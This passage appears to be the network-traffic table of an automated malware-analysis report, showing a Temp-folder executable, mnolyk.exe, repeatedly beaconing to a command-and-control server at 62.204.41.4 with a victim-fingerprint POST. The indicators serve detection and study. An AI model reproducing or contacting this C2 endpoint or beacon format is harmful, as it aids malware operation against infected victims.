Feb 7, 2023 20:02:56.876737118 CET	579	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
432	192.168.2.6	50156	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:57.043867111 CET	580	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:57.110049009 CET	580	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
433	192.168.2.6	50157	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:57.285145044 CET	581	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:57.349086046 CET	581	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
434	192.168.2.6	50158	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:57.529246092 CET	582	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:57.593482971 CET	582	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
435	192.168.2.6	50159	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:57.764940977 CET	583	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:57.828329086 CET	583	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
436	192.168.2.6	50160	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:58.000083923 CET	584	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:58.066256046 CET	584	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
437	192.168.2.6	50161	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:58.254041910 CET	585	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:58.319019079 CET	585	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
438	192.168.2.6	50162	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:58.501955032 CET	586	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:58.565460920 CET	586	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
439	192.168.2.6	50163	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:58.736660957 CET	587	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:58.802519083 CET	587	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.6	49763	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:01.550107002 CET	157	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:01.612922907 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
440	192.168.2.6	50164	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:58.984888077 CET	588	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:59.050481081 CET	588	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
441	192.168.2.6	50165	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:59.233845949 CET	589	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:59.298787117 CET	589	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
442	192.168.2.6	50166	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:59.478158951 CET	590	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:59.541083097 CET	590	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
443	192.168.2.6	50167	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:59.715668917 CET	591	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:59.780316114 CET	591	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
444	192.168.2.6	50168	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:59.953138113 CET	592	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:00.018917084 CET	592	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
445	192.168.2.6	50169	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:00.200664997 CET	592	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:00.265571117 CET	593	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
446	192.168.2.6	50170	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:00.433374882 CET	593	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:00.494765043 CET	594	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
447	192.168.2.6	50171	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:00.685944080 CET	594	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:00.749867916 CET	595	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
448	192.168.2.6	50172	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:00.921461105 CET	595	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:00.986504078 CET	596	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
449	192.168.2.6	50173	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:01.155358076 CET	597	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:01.220072985 CET	597	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.6	49764	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:01.795053005 CET	158	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:01.859669924 CET	158	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
450	192.168.2.6	50174	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:01.410758972 CET	598	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:01.474220991 CET	598	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
451	192.168.2.6	50175	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
